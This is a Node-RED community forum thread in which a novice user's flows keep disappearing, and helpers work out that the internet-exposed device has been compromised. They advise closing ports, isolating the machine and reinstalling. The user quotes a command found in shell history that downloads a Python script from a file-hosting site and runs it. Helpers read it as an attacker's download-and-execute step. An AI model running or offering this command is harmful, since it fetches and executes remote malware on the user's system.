# Flows disappear after a few hours!

**URL:** <https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458>\
**Category:** General\
**Created:** [30 October 2023 06:46 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458 "2023-10-30T06:46:05Z")\
**Posts on this page:** 20\
**Page:** 1

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [30 October 2023 06:46 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/1 "2023-10-30T06:46:05Z")

</div>

I'm very bad at this.  
Have managed to install Node-Red and a MQTT on my ROCK 4 SE card with Debian 11. The installation took place in January 2023. Got nice Flows connected to my IOTs. Everything has worked great until now.  
My Flows just disappeared. Putting them back, import and then after about 24 hours they are gone again. Nothing else stops working but only Flows in Node-Red disappear. Node-Red works fine but is missing all my constructed Flows.

Tried to search and read and somewhere they say that the problem is that the creation of Flows ends up stored only in memory, not on the memory card I use as storage and OS.  
Could that be the problem or what could it be?

I don't understand how I can control this, and if so, not fix it either.  
Please can you help me solve the problem pedagogically?

As I said, I'm really bad with Linux, but it's fun to tinker 🙂

Regard  
Ola A. , Sweden

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [30 October 2023 07:38 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/2 "2023-10-30T07:38:06Z")

</div>

Are you using Docker?

Stop node red and start it again in a command window. Post the full output from the start command. It should start with the Welcome to node red message. Copy/paste please, not screenshot.

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [30 October 2023 07:56 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/3 "2023-10-30T07:56:38Z")

</div>

Hello 🙂  
What is Docker?  
Attached is a txt-file with the startlogg text.

Thank you so much!  
[Startlogg\_Node-red\_OlaA\_231010\_854.txt](https://discourse.nodered.org/uploads/short-url/vknsAshcIu4HdBo8BIxdyZToyJP.txt) (2.9 KB)

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [30 October 2023 10:09 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/4 "2023-10-30T10:09:16Z")

</div>

> [@Olaa](#):
>
> What is Docker?

I would have thought that your favourite search engine would have answered that in seconds, but it doesn't matter because if you don't know then you are not using it.

Please in future paste logs directly into a reply, I don't want my phone downloads littered with such things.

The only unusual thing I can see is that it appears that node-red-contrib-googlehome-actions-v2 conflicts with node-red-contrib-googlehome-actions-v2-piyanggoon which probably isn't surprising. You should uninstall one of those. That is not likely to be the cause of the problem, but you should fix it first anyway. Always fix problems you understand first, even if you think it is nothing to do with issue you are investigating.

If you power the machine down, wait 30 seconds (I assume it is not battery backed) and then restart, is it ok? If it is then the flows must be stored on permanent storage, not RAM.

After it fails next time, look in /var/log/syslog for the node-red messages and see what it says. You can do that using  
`grep -i "node-red" /var/log/syslog`  
or if it has moved on to another syslog, then  
`grep -i "node-red" /var/log/syslog.1`

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [30 October 2023 10:37 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/5 "2023-10-30T10:37:47Z")

</div>

> [@Colin](#):
>
> node-red-contrib-googlehome-actions-v2 conflicts with node-red-contrib-googlehome-actions-v2-piyanggoon

OK I try to uninstall google home actions... And power it down.

Thanks 🙂

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 06:52 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/6 "2023-10-31T06:52:28Z")

</div>

> [@Colin](#):
>
> grep -i "node-red" /var/log/syslog.1

Did as you said and shut down the computer completely for approx. 15 minutes Everything then works normally until 17:00 when everything is suddenly gone again, only Flow. Added Nodes are available as usual.  
Tried your commands but they don't work, just get:

ola\_a@B75-mqtt:~$ grep -i "node-red" /var/log/syslog  
grep: /var/log/syslog: No such file or directory  
ola\_a@B75-mqtt:~$ -i "node-red" /var/log/syslog  
bash: -i: command not found

ola\_a@B75-mqtt:~$ grep -i "node-red" /var/log/syslog.1  
grep: /var/log/syslog.1: No such file or directory  
ola\_a@B75-mqtt:~$

* * *

Here is a Node red log:  
You can see when I recreated flow in the morning. Then at 17:48 something happens. That's when everything disappears.

Oct 30 08:52:41 - [info] | [http://0.0.0.0:1880/](http://0.0.0.0:1880/)  
Oct 30 08:52:41 - [info] | Installed packages:  
30 Oct 08:52:41 - [info] +----------------------------------- ---------------  
30 Oct 08:52:41 - [info] Starting flows  
30 Oct 08:52:41 - [info] Started flows  
30 Oct 08:52:42 - [info] [mqtt-broker:B75-MQTT] Connected to broker: mqtt://B75-MQTT:1883  
30 Oct 11:40:23 - [info] Uninstalling module: node-red-contrib-googlehome-actions-v2-piyanggoon  
30 Oct 11:40:30 - [info] Uninstalled module: node-red-contrib-googlehome-actions-v2-piyanggoon  
30 Oct 11:40:30 - [info] Removed node types:  
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-controller  
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-intent  
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-ask  
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-send  
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-message  
30 Oct 11:40:49 - [info] Stopping flows  
30 Oct 11:40:49 - [info] Stopped flows  
30 Oct 11:40:49 - [info] Updated flows  
30 Oct 11:40:49 - [info] Starting flows  
30 Oct 11:40:49 - [info] Started flows  
30 Oct 11:40:49 - [info] [mqtt-broker:B75-MQTT] Connected to broker: mqtt://B75-MQTT:1883  
30 Oct 17:48:36 - [info] Stopping modified flows  
30 Oct 17:48:36 - [info] Stopped modified flows  
30 Oct 17:48:36 - [info] Updated flows  
30 Oct 17:48:36 - [info] Starting modified flows  
30 Oct 17:48:36 - [info] Started modified flows

* * *

Found this mysterious command. What could it be, virus?  
ola\_a@B75-mqtt:~$ curl -O [https://files.catbox.moe/0z2jmi.py](https://files.catbox.moe/0z2jmi.py) && python3 0z2jmi.py

* * *

# Here are today's stops and starts. Started Node-RED graphical event wiring tool. 31 Oct 07:37:42 - [info] Welcome to Node-RED

31 Oct 07:37:42 - [info] Node-RED version: v3.0.2  
31 Oct 07:37:42 - [info] Node.js version: v16.19.0  
31 Oct 07:37:42 - [info] Linux 4.4.194-11-rk3399-rockchip-g1bb08d49cc40 arm64 LE  
31 Oct 07:37:43 - [info] Loading palette nodes  
31 Oct 07:37:53 - [info] Dashboard version 3.2.3 started at /ui  
31 Oct 07:37:54 - [warn] rpi-gpio : Raspberry Pi specific node set inactive  
31 Oct 07:37:54 - [info] Settings file : /home/ola\_a/.node-red/settings.js  
31 Oct 07:37:54 - [info] Context store : 'default' [module=memory]  
31 Oct 07:37:54 - [info] User directory : /home/ola\_a/.node-red  
31 Oct 07:37:54 - [warn] Projects disabled : editorTheme.projects.enabled=false  
31 Oct 07:37:54 - [info] Flows file : /home/ola\_a/.node-red/flows.json  
31 Oct 07:37:54 - [info] Server now running at [http://127.0.0.1:1880/](http://127.0.0.1:1880/)  
31 Oct 07:37:54 - [warn]

* * *

Your flow credentials file is encrypted using a system-generated key.  
If the system-generated key is lost for any reason, your credentials  
file will not be recoverable, you will have to delete it and re-enter  
your credentials.  
You should set your own key using the 'credentialSecret' option  
your settings file. Node-RED will then re-encrypt your credentials  
file using your chosen key the next time you deploy a change.

* * *

31 Oct 07:37:54 - [info] +----------------------------------- ---------------  
Oct 31 07:37:54 - [info] | uibuilder v6.0.0 initialised  
Oct 31 07:37:54 - [info] | root folder: /home/ola\_a/.node-red/uibuilder  
Oct 31 07:37:54 - [info] | Using Node-RED's web server at:  
Oct 31 07:37:54 - [info] | [http://0.0.0.0:1880/](http://0.0.0.0:1880/)  
Oct 31 07:37:54 - [info] | Installed packages:  
31 Oct 07:37:54 - [info] +----------------------------------- ---------------  
31 Oct 07:37:54 - [info] Starting flows  
31 Oct 07:37:54 - [info] Started flows

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [31 October 2023 08:18 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/7 "2023-10-31T08:18:24Z")

</div>

> [@Olaa](#):
>
> Found this mysterious command. What could it be, virus?  
> ola\_a@B75-mqtt:~$ curl -O [https://files.catbox.moe/0z2jmi.py](https://files.catbox.moe/0z2jmi.py) && python3 0z2jmi.py

It probably means that you have been hacked. Have you opened ports to allow access to node red from the Internet? Shut the machine down immediately before more damage is caused.

Where did you find that command?

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 10:09 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/8 "2023-10-31T10:09:21Z")

</div>

In connection with the command interpreter, you can go back to previous commands with the arrows when it appeared.  
Are there any antivirus programs for Linux?

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [31 October 2023 10:29 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/9 "2023-10-31T10:29:04Z")

</div>

You didn't answer the question:

> [@Colin](#):
>
> Have you opened ports to allow access to node red from the Internet?

If you have, and have not paid attention to preventing hackers getting in via node-red, then no virus protection would help.  
See [Safely accessing Node-RED over the Internet](https://discourse.nodered.org/t/safely-accessing-node-red-over-the-internet/45024)

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 10:45 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/10 "2023-10-31T10:45:40Z")

</div>

Yes, I have ports open, two for my outdoors IOT to be able to talk to my Mosquitto broker and to be able to look at Node-Red data.  
If you read online, you apparently use Python in connection with MQTT, so I wonder if Node-Red uses Python to communicate with Mosquitto.  
I have closed the gates now.

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [31 October 2023 10:49 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/11 "2023-10-31T10:49:46Z")

</div>

> [@Olaa](#):
>
> I wonder if Node-Red uses Python to communicate with Mosquitto.

No. If you are referring to the strange curl command you found, it is downloading a python script and then running it. The script presumably does the damage.

---

<div class="post-metadata">

**Author:** ![jbudd](https://avatars.discourse-cdn.com/v4/letter/j/5f8ce5/32.png) [@jbudd](https://discourse.nodered.org/u/jbudd)\
**Post date:** [31 October 2023 10:52 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/12 "2023-10-31T10:52:21Z")

</div>

Too late now but if you have devices outside your home LAN, it's probably best to use a cloud based MQTT broker (with a password too complicated to guess/remember).

I'm pretty sure though that it would be the Node-red port that was used to attack you.

It's not exactly more secure but if your port forwarding maps a very high external port number eg 61357 to 1880 you are much less likely to be spotted by port scanners.

---

<div class="post-metadata">

**Author:** ![jbudd](https://avatars.discourse-cdn.com/v4/letter/j/5f8ce5/32.png) [@jbudd](https://discourse.nodered.org/u/jbudd)\
**Post date:** [31 October 2023 10:54 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/13 "2023-10-31T10:54:21Z")

</div>

I downloaded that script, or maybe another one someone posted. Just a couple of lines.  
It downloads and runs another script (from a server which my PiHole disallows acess to).

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [31 October 2023 10:57 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/14 "2023-10-31T10:57:20Z")

</div>

> [@Olaa](#):
>
> I have closed the gates now.

Have you powered the machine down, or at least isolated it from the network? Once into that machine the hackers have access to your local network, so other machines on the network might be affected. We have not seen any instances where that has been shown to have happened, but it is possible.

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 11:06 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/15 "2023-10-31T11:06:03Z")

</div>

OK. Have closed the gates now. Will see what happens after 17:00 tonight. Otherwise I put back a backup I have since the start in januari installation. I will come back tomorrow.

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [31 October 2023 11:25 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/16 "2023-10-31T11:25:35Z")

</div>

> [@Olaa](#):
>
> Will see what happens after 17:00 tonight.

Whatever happens, you must wipe the disc/card and re-install the OS. That is the only way you will know that you have cleared everything out.

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 12:04 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/17 "2023-10-31T12:04:58Z")

</div>

OK And virus software for Linux?

---

<div class="post-metadata">

**Author:** ![zenofmud](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/zenofmud/32/316_2.png) [@zenofmud](https://discourse.nodered.org/u/zenofmud)\
**Post date:** [31 October 2023 12:27 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/18 "2023-10-31T12:27:38Z")

</div>

Did you try a google search?

---

<div class="post-metadata">

**Author:** ![Olaa](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/olaa/32/73030_2.png) [@Olaa](https://discourse.nodered.org/u/Olaa)\
**Post date:** [31 October 2023 13:14 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/19 "2023-10-31T13:14:43Z")

</div>

Yes of **course, Naturally** , I ask to get some good tips on good software that people have experience with. You couldn't have suggested someone good!?

---

<div class="post-metadata">

**Author:** ![jbudd](https://avatars.discourse-cdn.com/v4/letter/j/5f8ce5/32.png) [@jbudd](https://discourse.nodered.org/u/jbudd)\
**Post date:** [31 October 2023 13:23 UTC](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458/20 "2023-10-31T13:23:06Z")

</div>

I 00go'd it.

Since my Node-red machine is command line only, my current PC antivirus, and most mainstream alternatives are disqualified.  
Which seemed to leave ClamAV which I was able to install on a new installation of RPiOS using the command line.

I considered enabling my router's guest network with isolation, port forwarding 1880 to that Pi, specifying a static IP & Google DNS server and watching what happened. It seemed like a lot of trouble, and would my router be safe?

But would the AV detect this malware's initial activity?

[Next page](https://discourse.nodered.org/t/flows-disappear-after-a-few-hours/82458.md?page=2)
